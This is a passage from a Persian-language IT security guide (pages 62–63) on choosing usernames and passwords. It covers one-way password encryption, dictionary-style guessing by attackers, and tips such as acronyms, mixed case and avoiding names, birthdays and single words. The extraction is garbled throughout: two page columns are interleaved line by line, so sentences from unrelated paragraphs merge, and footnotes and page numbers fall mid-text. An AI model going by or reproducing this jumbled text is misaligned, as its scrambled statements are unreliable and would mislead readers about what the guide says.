ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺫﺧﻴـﺮﻩ ﻣـﻲﺷـﻮﻧﺪ ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﻨﺪ.
ﻻ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﻛﺴﻲ ﺑﻪ ﺩﻳﺴﻚ ﺩﺳﺘﺮﺳـﻲ ﻣﻌﻤﻮ ﹰ ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﺍﻧﺘﺨﺎﺏ ﻧﺪﻫـﺪ ،ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﺷـﻤﺎ
ﭘﻴﺪﺍ ﻛﺮﺩ ﻗﺎﺩﺭ ﺑﻪ ﻣﺸﺎﻫﺪﺓ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻫﻤﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺳﻴﺴﺘﻢ ﺗﻌﻴﻴﻦ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻣﺎ ﺍﮔﺮ
ﺍﻳﻦ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺭﻣﺰﻫـﺎﻱ ﻻﺯﻡ ﺑﺎﺷﺪ ﺧﻮﺩﺗﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﭼﻪ ﻧﻜـﺎﺗﻲ ﺭﺍ ﺑﺎﻳـﺪ
ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﺴﻮﻳﻪ ٢٥ﻣﻲﮔﻮﻳﻨﺪ .ﺩﺭ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﻗﺘﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺭﺍ ﻭﺍﺭﺩ
ﺁﻳﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ •
ﻣﻲﻛﻨﻴﺪ ،ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺎ ﻧﺴﺨﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ
ﺷﻤﺎ ﺑﺎﺷﺪ؟ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳـﺖ ﺍﻳـﻦ ﺍﺳـﻢ ﻛﻤـﻚ ﻛﻨـﺪ ﻛـﻪ
ﺩﻭﺳﺘﺎﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧﺘﺎﻥ ﺷـﻤﺎ ﺭﺍ ﺑـﺸﻨﺎﺳﻨﺪ؟ ﻳـﻚ ﺁﺩﺭﺱ
24 Online Service
25 One-way Encryption
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٦٢
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻋـﺪﺍﺩ ﺗﺮﻛﻴﺒـﻲ ،ﻋﻼﻣﺘﻬـﺎﻱ ﻣﺠـﺎﺯ ﻭ • ﺩﺭ ﺩﻳﺴﻚ ﻣﻘﺎﻳﺴﻪ ﻣﻲﮔﺮﺩﺩ )ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺿﻤﻴﻤﺔ ۱ﻫﻤﻴﻦ
ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. ﺑﺨﺶ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(.
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻓـﻀﺎﻱ ﺧـﺎﻟﻲ ﺍﺳـﺘﻔﺎﺩﻩ •
ﻗﺎﻧﻮﻥ ﺳﻮﻡ:
ﻛﻨﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺑـﻪ ﺷـﻜﻞ ﻳـﻚ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ
ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧـﺮﺍ ﺑﺮﺍﺣﺘـﻲ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﺻﻠﻪﻫﺎ ﺭﺍ ﺣـﺬﻑ
ﺑﻪ ﺧﺎﻃﺮ ﺁﻭﺭﺩ ،ﻭﻟﻲ ﺣﺪﺱ ﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ
ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻟﻐﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭼـﺴﺒﻴﺪﻩ-
ﺍﻧﺪ(.
ﻣﺸﻜﻞ ﺑﺎﺷﺪ.
ﺑﻪ ﻋﻠﺖ ﻓﻘـﺪﺍﻥ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻴﺰﺑـﺎﻥ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺧﺎﻃﺮ ﺑـﺴﭙﺎﺭﻳﺪ •
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺭﻣﺰ ﻋﺒـﻮﺭ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ
ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺖ ﻳﺎﺑﻨﺪ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ
ﻛﻨﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﻓﺮﺩﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ
ﻱ
ﺑﻴﺎﺑﻨﺪ .ﺣﺘـﻲ ﺍﮔـﺮ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭ ﹺ
ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﻛـﺸﻒ ﻛﻨـﺪ ،ﺍﻣﻨﻴـﺖ
ﻳﻜﺴﻮﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﺑﺎﺯ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧـﺪ
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﺁﻧﻬــﺎ ﺍﺯ ﺭﻣــﺰ ﻋﺒــﻮﺭ ﻣــﺸﺎﺑﻪ
ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻛﺸﻒ ﻛﻨﺪ؛ ﭼـﻮﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻳﺪ ﻧﻴﺰ ﺑﻪ ﺧﻄـﺮ ﺧﻮﺍﻫـﺪ ﺍﻓﺘـﺎﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ
ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ
ﭼﻨﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ
ﺁﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤـﺔ ﻛﻠﻤـﺎﺕ ﺩﺭﻭﻥ ﻓﺮﻫﻨـﮓ
ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺮﺍﻱ
ﻼ ﺍﮔـﺮﻟﻐﺎﺕ ﻭ ﺳﺎﻳﺮ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺘﺪﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﻟﺬﺍ ﻣـﺜ ﹰ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﻭ ﺩﻳﮕﺮ ﻣﻄﺎﻟﺐ ،ﻧﻴﺎﺯﻱ ﺑـﻪ
ﺷﻤﺎ ﺍﺯ ﻛﻠﻤﺔ birthdayﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ
ﭘﺮﺩﺍﺧﺖ ﭘﻮﻝ ﻳﺎ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻧﻴـﺴﺖ ،ﺍﻣـﺎ
ﻣﻬﺎﺟﻢ ﻫﻨﮕﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻤـﺔ birthdayﻣﺘﻮﺟـﻪ ﻣـﻲﺷـﻮﺩ
ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﻣﻘﺎﻻﺕ ﺑﻌﻀﻲ ﺍﺯ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ
ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺁﻥ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺍﺳـﺖ
ﻣﺮﺑﻮﻃﻪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻭﺍﺭﺩ ﻛﻨﻴـﺪ.
ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻭ ﻟﺬﺍ ﺍﺯ ﺁﻥ ﭘﺲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ.
ﺩﺭﻭﺍﻗﻊ ﺁﻧﻬﺎ ﻓﻘﻂ ﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺷﻤﺎ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺁﻧﻬـﺎ ﻭﺍﺭﺩ
ﺷـﻮﻳﺪ؛ ﺑﻨـﺎﺑﺮ ﺍﻳــﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑــﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻣﻄﺎﻟــﺐ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻛﻞ ﺍﻳﺪﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﺍﺟﺎﺯﺓ
ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻭﺭﻭﺩ ﺷﻤﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺭ ﺯﻣﺎﻥ ﺩﻟﺨﻮﺍﻩ ﻭ ﺩﺷـﻮﺍﺭ ﻛـﺮﺩﻥ ﺣـﺪﺱ
ﻧﻤﺎﻳﻴﺪ. ﺁﻥ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺍﺳـﺖ ،ﻣـﻲﺗـﻮﺍﻥ ﭼﻨـﺪ ﻣﺸﺨـﺼﻪ ﺑـﺮﺍﻱ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺑﺮ ﺷـﻤﺮﺩ .ﻣـﺸﺎﺑﻪ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ،
ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺣﺮﻭﻑ ﺭﺍ ﺑﺎ ﻋﻼﺋﻢ ﻳﺎ ﺍﺭﻗﺎﻡ ﻣـﺸﺎﺑﻪ ﻋـﻮﺽ •
ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗـﻮﺍﻧﻴﻦ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻣـﺰ
ﻼ ﺍﺯ ﺭﻗﻢ " "1ﺑﺠـﺎﻱ ﺣـﺮﻭﻑ " "Iﻳـﺎ " ،"Lﺍﺯﻣﻲﻛﻨﻨﺪ؛ ﻣﺜ ﹰ
ﻋﺒﻮﺭ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻧﺪ )ﺣﺪﺍﻗﻞ ﻭ ﺣـﺪﺍﻛﺜﺮ ﻃـﻮﻝ ،ﺣـﺮﻭﻑ ﻣﺠـﺎﺯ ﺑـﺮﺍﻱ
ﺷﻤﺎﺭﺓ " "3ﻳﺎ ﻋﻼﻣﺖ " "#ﺑﺠﺎﻱ ﺣﺮﻑ " ،"Eﺍﺯ ﺭﻗﻢ ""0
ﺍﺳﺘﻔﺎﺩﻩ ،ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ(.
ﺑﺠﺎﻱ ﺣﺮﻑ " ،"Oﺍﺯ ﻋﻼﻣﺖ "@" ﺑﺠﺎﻱ ﺣـﺮﻑ " ،"Aﻭ
ﺍﺯ ﺭﻗﻢ " "5ﺑﺠﺎﻱ ﺣﺮﻑ " "Sﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨـﺪ .ﺍﻳﻨﻜـﺎﺭ ﻫﺮﮔﺰ ﺍﺯ ﻳﻚ ﻛﻠﻤﺔ ﻣﻨﻔﺮﺩ ﺩﺭ ﺯﺑﺎﻥ ﻣﺎﺩﺭﻱ ﺧـﻮﺩ ﺑﻌﻨـﻮﺍﻥ •
ﺗﺮﻓﻨﺪ ﺧﻮﺑﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﻳـﺎﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻳـﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴـﺪ .ﺍﻧﺘﺨـﺎﺏ ﻳـﻚ ﻋﺒـﺎﺭﺕ ،ﻳـﻚ
ﻼ ﺁﺷﻨﺎﺳـﺖ .ﺍﻳـﻦ ﻣﻬﺎﺟﻢ ﺣﺮﻓﻪﺍﻱ ﺑﺎ ﺍﻳﻦ ﺣﻘـﻪﻫـﺎ ﻛـﺎﻣ ﹰ ﺟﻤﻠــﻪ ،ﻭ ﻳــﺎ ﻗﻄﻌــﺎﺗﻲ ﺍﺯ ﻛﻠﻤــﺎﺕ ﺑــﺮﺍﻱ ﺍﻳــﻦ ﻣﻨﻈــﻮﺭ
ﺣﻘﻪﻫﺎ ﻛﺎﺭ ﻭﻱ ﺭﺍ ﻛﻤﻲ ﺳﺨﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﻏﻴﺮ ﻣﻤﻜـﻦ ﻣﻨﺎﺳﺐﺗﺮ ﺍﺳﺖ.
ﻧﻤﻲﺳﺎﺯﺩ. ﭼﻨﺎﻧﭽﻪ ﺳﻴﺴﺘﻢ ﻫﻢ ﺣﺮﻭﻑ ﺑﺰﺭﮒ ﻭ ﻫﻢ ﺣﺮﻭﻑ ﻛﻮﭼﻚ •
ﺣﺮﻑ " "Iﺭﺍ ﺑﻪ ﺟﺎﻱ ") "eyeﭼﺸﻢ( ﻳﺎ " "ayeﻳﺎ ﻫﺮ ﻛﻠﻤﺔ • ﺭﺍ ﺩﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻭﻑ ﻣﺠﺎﺯ ﻗﻠﻤﺪﺍﺩ ﻣﻲﻛﻨﺪ،
ﻣﻌﻨﺎﺩﺍﺭ ﺩﺭ ﺯﺑﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻋﻮﺽ ﻛﻨﻴﺪ .ﺍﻳﻨﻜﺎﺭ ﺑﺨـﺼﻮﺹ ﺍﺯ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ -ﻭﻟﻲ ﻧﻪ ﺩﺭ ﺟﺎﻱ ﺻﺤﻴﺢ
ﺑﺮﺍﻱ ﻟﻐﺎﺗﻲ ﻣﺜـﻞ " "iconﻛـﻪ ﭘـﺲ ﺍﺯ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺑـﻪ ﻲ ﺧﻮﺩ.ﻭ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨ ﹺ
" "eyeconﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ﻣﻔﻴﺪ ﺍﺳﺖ.
٦٣ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﺮﭼﻪ ﻛﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﻧﻮﺷﺘﻦ ﺁﻧـﺮﺍ ﺑﺨـﺎﻃﺮ • ﺍﺯ ﺳﺮﻧﺎﻡﻫﺎ )ﺣﺮﻭﻑ ﺍﻭﻝ ﻟﻐﺘﻬﺎﻱ ﺳﺎﺯﻧﺪﻩ ﻳﻚ ﻋﺒﺎﺭﺕ( ﺍﺳـﺘﻔﺎﺩﻩ •
ﺑﺴﭙﺎﺭﻳﺪ .ﻫﺮﮔﺰ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺭﺍ ﺟـﺎﻳﻲ ﻧﻨﻮﻳـﺴﻴﺪ ﻭ ﺁﻧـﺮﺍ ﺩﺭ ﻧﻤﺎﻳﻴﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ " "tgbwcﺳـﺮﻧﺎﻣﻲ ﺑـﺮﺍﻱ ﺷـﻌﺎﺭ
ﻣﺤﻞ ﻛﺎﺭ ﻳﺎ ﺭﻭﻱ ﺑﺮﭼﺴﺒﻬﺎﻱ ﻋﻨﺎﻭﻳﻦ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ. ﻣﻌـﺮﻭﻑ ﻛﻮﻛـﺎﻛﻮﻻ )"("Things Go Better With Coke
ﻣﻲﺑﺎﺷﺪ.
ﻫﺮﮔـﺰ ﻓﻬﺮﺳـﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱﻧـﺸﺪﺓ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ •
ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﻜﻨﻴﺪ. ﻫﺠﻲ ﻛﺮﺩﻥ ﻟﻐﺎﺕ ﺑﺼﻮﺭﺕ ﺑﺮﻋﻜﺲ ﺁﻧﻬﺎ ﺭﺍ ﻛﻤﻲ ﻣـﺒﻬﻢ •
ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺷﻨﺎﺳﺎﻳﻲﺷﺎﻥ ﺭﺍ ﺳﺨﺖ ﻧﻤﻲﻧﻤﺎﻳﺪ.
ﺑﻬﺘﺮﻳﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺭﺷﺘﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﺍﺭﻗﺎﻡ ﺍﺳﺖ ،ﺍﻣﺎ
ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﻣﺎ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ ﻫﺮﮔﺰ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ: •
ﺑﺨﺶ ﺩﻭﻡ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺣﺮﻭﻑ ،ﺷﻤﺎﺭﻩﻫﺎ، ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﺍﺳﻢ ﻣﺴﺘﻌﺎﺭ ﺧﻮﺩﺗﺎﻥ؛ o
ﻧﺸﺎﻧﻪ ﻫﺎﻱ ﺧﺎﺹ ﻭ ﺟﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ ﻭ ﻣﻴﺎﻥ ﺣـﺮﻭﻑ ﻧﺎﻡ ﻫﻤﺴﺮ ،ﻳﺎ ﺍﺳﺎﻣﻲ ﻓﺮﺯﻧﺪﺍﻥ ﻭ ﻭﺍﻟﺪﻳﻦ؛ o
ﺭﻣﺰﻫﺎ ﺑﺴﺎﺩﮔﻲ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩ ﻣﻲﺷـﻮﻧﺪ ،ﺍﻣـﺎ ﻳـﺎﻓﺘﻦ ﺁﻧﻬـﺎ ﺩﺭ ﺍﺳﺎﻣﻲ ﺣﻴﻮﺍﻧﺎﺕ ﺧﺎﻧﮕﻲ؛ o
ﻓﺮﻫﻨﮕﻬﺎﻱ ﻟﻐﺎﺕ ﻭ ﻳﺎ ﺣﺪﺱ ﺯﺩﻧﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ. ﺭﻭﺯ ﺗﻮﻟﺪ ﺧﻮﺩ ﻳﺎ ﻫﺮﻳﻚ ﺍﺯ ﺩﻭﺳﺘﺎﻥ ﻭ ﺧﻮﻳﺸﺎﻭﻧﺪﺍﻥ؛ o
ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ،ﺷﻤﺎﺭﺓ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻳﺎ ﻣﺪﺍﺭﻙ ﻣﺸﺎﺑﻪ؛ o
ﺗﻮﺿﻴﺤﺎﺕ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻧﮓ ﻣﻮﺭﺩ ﻋﻼﻗﻪ؛ o
ﻣﻘﺎﻡ ﻳﺎ ﻋﻨﻮﺍﻥ ﺷﻐﻠﻲ؛ o
Computers
Are Useful
ﻋﺒــﺎﺭﺗﻲ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧــﻪ ﺑــﺎ ﺁﻥ ﻧﺎﻡ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ؛ o
ﻣﻮﺍﻓﻖ ﻫﺴﺘﻨﺪ. ﻫﺮ ﭼﻴﺰ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻳﺪ؛ o
ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻛﻼﺳــﻴﻚ ﻣﺜــﻞ " "Xyzzyﻳــﺎ o
") "Ploverﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
Computers
aReuseFul
ﻋﺒــﺎﺭﺕ ﺍﻭﻟﻴــﻪ ﺑــﺪﻭﻥ ﺟــﺎﻱ ﺧــﺎﻟﻲ ﻭ ﻗــﺮﺍﺭﺩﺍﺩﻥ ﺗﻜﺮﺍﺭ ﺣﺮﻭﻑ ﻳﺎ ﺍﺭﻗﺎﻡ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺮﺗﻴﺒﻲ o
ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ﻫﺮ ۴ﺣﺮﻑ. ﻣﺜﻞ " "aaaa9999" ،"۱۲۳۴۵۶ﻳﺎ "."ABCDE
ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻑ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺍﺯ ﻣﻘـﺪﺍﺭ •
Comutrsa
